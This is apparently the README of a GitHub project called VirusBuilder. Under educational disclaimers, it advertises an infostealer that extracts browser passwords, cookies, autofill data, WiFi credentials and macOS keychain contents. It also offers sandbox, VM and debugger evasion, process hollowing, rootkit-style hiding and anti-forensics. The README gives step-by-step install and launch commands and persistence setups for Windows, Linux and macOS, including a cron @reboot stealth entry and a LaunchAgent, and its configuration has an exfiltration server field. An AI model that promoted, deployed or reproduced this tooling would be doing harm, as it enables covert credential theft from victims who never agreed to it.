🚨 THIS TOOL IS DESIGNED EXCLUSIVELY FOR EDUCATIONAL PURPOSES AND AUTHORIZED SECURITY TESTING ONLY. UNAUTHORIZED USE FOR MALICIOUS PURPOSES IS STRICTLY PROHIBITED AND MAY RESULT IN SEVERE LEGAL CONSEQUENCES.
🔒 Users are solely responsible for ensuring compliance with all applicable laws and regulations in their jurisdiction. The developers assume no responsibility for any misuse of this tool.
- Overview
- Features
- Installation
- Usage Tutorials
- Configuration
- Security Features
- Legal Disclaimer
- Support
VirusBuilder is a comprehensive cybersecurity educational platform that demonstrates advanced data extraction, encryption, and security analysis techniques. This tool provides insights into:
- Data Extraction: Browser data, system information, network credentials
- Advanced Encryption: Multi-layer encryption with AES-256-GCM
- Stealth Operations: Anti-detection and evasion techniques
- Persistence Mechanisms: Various persistence methods for educational purposes
- Cross-Platform Support: Windows, Linux, and macOS compatibility
virusBuilder/
├── core/ # Core functionality modules
│ ├── encryption_manager.py # Advanced encryption
│ ├── extraction_engine.py # Data extraction
│ ├── security_manager.py # Security management
│ ├── stealth_manager.py # Stealth operations
│ └── persistence_manager.py # Persistence mechanisms
├── browser_tools/ # Browser-specific tools
├── crypto_tools/ # Cryptographic utilities
├── evasion_tools/ # Anti-detection techniques
├── mobile_tools/ # Mobile platform support
├── network_tools/ # Network utilities
├── payload_tools/ # Payload generation
├── persistence_tools/ # Persistence mechanisms
├── stealth_tools/ # Stealth operations
├── gui/ # Graphical user interface
├── config/ # Configuration files
└── docs/ # Documentation
- Advanced Encryption: AES-256-GCM with PBKDF2 key derivation
- Secure Communication: TLS 1.3 encrypted data transmission
- Input Validation: Comprehensive sanitization and validation
- Audit Logging: Complete activity tracking and monitoring
- Anti-Detection: Advanced evasion techniques and stealth mechanisms
- System Intelligence: Comprehensive system profiling and analysis
- Browser Data Extraction:
- Chrome/Edge password recovery with secure decryption
- Browser history and bookmark analysis
- Cookie and session management
- Autofill data extraction
- Network Analysis: WiFi credential extraction and network mapping
- File System Scanning: Advanced file discovery and categorization
- Process Monitoring: Real-time system process analysis
- Multi-Layer Encryption:
- Data encryption with rotating keys
- Secure key management and storage
- End-to-end encrypted communication
- Stealth Operations:
- Process hiding and obfuscation
- Anti-debugging techniques
- Memory protection and cleanup
- Persistence Mechanisms:
- Registry-based persistence
- Service installation capabilities
- Scheduled task creation
- Neural Network Obfuscation: AI-driven code transformation
- Genetic Algorithm Mutation: Evolutionary code optimization
- Reinforcement Learning: Adaptive evasion strategies
- Deep Learning Pattern Generation: ML-based pattern creation
- AI Behavioral Simulation: Intelligent human behavior mimicry
- Python 3.9+ (Recommended: Python 3.11)
- Operating System: Windows 10/11, Linux (Ubuntu 20.04+), macOS 10.15+
- Administrator/Root privileges (for full functionality)
- Internet connection (for updates and features)
- Minimum 4GB RAM (8GB recommended)
- 2GB free disk space
# Clone the repository
git clone https://github.com/DUptain1993/virusBuilder.git
cd virusBuilder
# Install dependencies
pip install -r requirements.txt
# Run enhanced setup
python setup_enhanced.py
# Launch the application
python launcher.py --mode production# Create virtual environment
python -m venv virusBuilder_env
# Activate virtual environment
# Windows:
virusBuilder_env\Scripts\activate
# Linux/macOS:
source virusBuilder_env/bin/activate
# Install with development dependencies
pip install -r requirements.txt
# Run tests
python setup_enhanced.py --test-only
# Build executable (optional)
pyinstaller --onefile --windowed launcher.py- Download Python 3.9+ from python.org
- Enable Developer Mode in Windows Settings
- Run Command Prompt as Administrator
# Navigate to project directory
cd C:\path\to\virusBuilder
# Install dependencies
pip install -r requirements.txt
# Run setup
python setup_enhanced.py
# Start the application
python launcher.py --mode production-
Launch the Application:
python launcher.py --mode production
-
Configure Settings:
- Edit
config/settings.yaml - Set encryption keys and targets
- Configure extraction methods
- Edit
-
Select Operations:
- Choose data extraction methods
- Configure stealth options
- Set persistence mechanisms
-
Execute Analysis:
python launcher.py --mode extraction --target C:\output\path
-
Review Results:
- Analyze extracted data
- View security reports
- Export findings
Registry Persistence:
python launcher.py --mode persistenceStealth Mode:
python launcher.py --mode stealthGUI Mode:
python launcher.py --mode production --guiEdit config/settings.yaml:
platform:
windows:
registry_persistence: true
service_installation: true
scheduled_tasks: true
startup_folder: true
wmi_events: true
extraction:
browsers:
chrome: true
edge: true
firefox: false
system:
registry: true
services: true
processes: true
network: true-
Update System Packages:
sudo apt update && sudo apt upgrade -y -
Install Python and Dependencies:
sudo apt install python3 python3-pip python3-venv git -y
-
Clone and Setup:
git clone https://github.com/DUptain1993/virusBuilder.git cd virusBuilder # Create virtual environment python3 -m venv venv source venv/bin/activate # Install dependencies pip install -r requirements.txt # Run setup python3 setup_enhanced.py
-
Launch the Application:
python3 launcher.py --mode production
-
Configure for Linux:
# Edit configuration nano config/settings.yaml -
Run Extraction:
python3 launcher.py --mode extraction --target /tmp/output
Systemd Service:
# Create service file
sudo nano /etc/systemd/system/virusbuilder.service
# Enable and start service
sudo systemctl enable virusbuilder.service
sudo systemctl start virusbuilder.serviceCron Persistence:
# Add to crontab
crontab -e
# Add: @reboot /path/to/virusBuilder/launcher.py --mode stealthLinux Configuration:
platform:
linux:
systemd_service: true
cron_persistence: true
bashrc_modification: true
profile_modification: true
extraction:
browsers:
chrome: true
firefox: true
chromium: true
system:
processes: true
network: true
files: true
logs: true-
Install Homebrew (if not installed):
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" -
Install Python and Dependencies:
brew install python3 git
-
Clone and Setup:
git clone https://github.com/DUptain1993/virusBuilder.git cd virusBuilder # Create virtual environment python3 -m venv venv source venv/bin/activate # Install dependencies pip install -r requirements.txt # Run setup python3 setup_enhanced.py
-
Launch the Application:
python3 launcher.py --mode production
-
macOS-Specific Configuration:
platform: macos: launchd_persistence: true login_items: true cron_persistence: true extraction: browsers: safari: true chrome: true firefox: true system: keychain: true processes: true network: true files: true
LaunchAgent Persistence:
# Create LaunchAgent
mkdir -p ~/Library/LaunchAgents
cp config/com.virusbuilder.plist ~/Library/LaunchAgents/
launchctl load ~/Library/LaunchAgents/com.virusbuilder.plistKeychain Access:
# Grant keychain access
python3 launcher.py --mode extraction --keychain-accessEdit config/settings.yaml:
application:
name: "VirusBuilder"
version: "2.0.0"
debug_mode: false
log_level: "INFO"
security:
encryption:
algorithm: "AES-256-GCM"
key_derivation: "PBKDF2"
iterations: 100000
salt_length: 32
key_length: 32
anti_detection:
process_hiding: true
memory_protection: true
debugger_detection: true
vm_detection: true
sandbox_evasion: true
extraction:
max_threads: 8
timeout: 30
chunk_size: 8192
retry_attempts: 3
browsers:
chrome: true
edge: true
firefox: true
safari: true
system:
processes: true
network: true
registry: true
services: true
files: true
files:
documents: true
images: false
archives: true
executables: false
communication:
server_url: ""
api_key: ""
timeout: 30
retry_attempts: 3
verify_ssl: true
encryption_enabled: true
compression_enabled: true# Production mode with GUI
python launcher.py --mode production --gui
# Stealth mode
python launcher.py --mode stealth
# Persistence mode
python launcher.py --mode persistence
# Extraction mode
python launcher.py --mode extraction --target /path/to/output
# Custom configuration
python launcher.py --config custom_config.yaml
# Version information
python launcher.py --version- AES-256-GCM: Advanced encryption standard
- PBKDF2: Password-based key derivation
- Argon2: Memory-hard password hashing
- ChaCha20-Poly1305: Stream cipher with authentication
- Process Hiding: Conceal running processes
- Memory Protection: Prevent memory analysis
- Debugger Detection: Detect and evade debuggers
- VM Detection: Identify virtual environments
- Sandbox Evasion: Bypass security sandboxes
- Rootkit-Level Hiding: Process, file, and registry hiding
- Process Hollowing: Legitimate process injection
- Memory-Only Execution: In-memory code execution
- Anti-Forensics: Evidence elimination techniques
This software is provided for educational and authorized security testing purposes only. The developers, contributors, and distributors of this software:
- DO NOT endorse or encourage any illegal activities
- DO NOT take responsibility for any misuse of this software
- DO NOT provide support for illegal or unauthorized activities
- STRONGLY RECOMMEND that users:
- Only use this software on systems they own or have explicit permission to test
- Comply with all applicable local, state, and federal laws
- Obtain proper authorization before conducting security testing
- Use this software responsibly and ethically
By using this software, you agree to:
- Use the software only for educational purposes or authorized security testing
- Not use the software for any illegal or unauthorized activities
- Comply with all applicable laws and regulations
- Assume full responsibility for your actions
- Not hold the developers liable for any consequences of misuse
This software may be used for:
- Educational purposes in cybersecurity courses
- Authorized penetration testing with proper documentation
- Security research in controlled environments
- Red team exercises with proper authorization
- Bug bounty programs with explicit permission
This software must NOT be used for:
- Unauthorized access to computer systems
- Data theft or unauthorized data collection
- Malware distribution or creation
- Any illegal activities
- Harassment or stalking
- Corporate espionage
- Any activities that violate laws or regulations
- User Manual:
docs/USER_MANUAL.md - API Documentation:
docs/API.md - Configuration Guide:
docs/CONFIGURATION.md - Troubleshooting:
docs/TROUBLESHOOTING.md
-
Permission Errors:
# Windows: Run as Administrator # Linux/macOS: Use sudo when necessary sudo python3 launcher.py --mode production
-
Import Errors:
# Check Python version python3 --version # Reinstall dependencies pip install -r requirements.txt --force-reinstall
-
Network Issues:
# Check firewall settings # Verify internet connectivity # Update configuration
- GitHub Issues: Create an issue
- Documentation: Check the
docs/directory - Logs: Check
logs/stealer.logfor detailed error information
For developers interested in contributing:
- Fork the repository
- Create a feature branch
- Make your changes
- Add tests
- Submit a pull request
This project is licensed under the Educational Use Only license. See the LICENSE file for details.
- Original Developer: Akki (Akhand Raj)
- Enhanced Edition: DUptain1993
- Security Researchers: Various contributors
- Open Source Community: For inspiration and tools
- Lines of Code: 50,000+
- Development Time: 200+ hours
- Features: 100+ security techniques
- Platforms: Windows, Linux, macOS
- Languages: Python, C, C++, JavaScript
🔒 Remember: With great power comes great responsibility. Use this tool ethically and legally.
Last Updated: December 2024 Version: 2.0.0 Developer: DUptain1993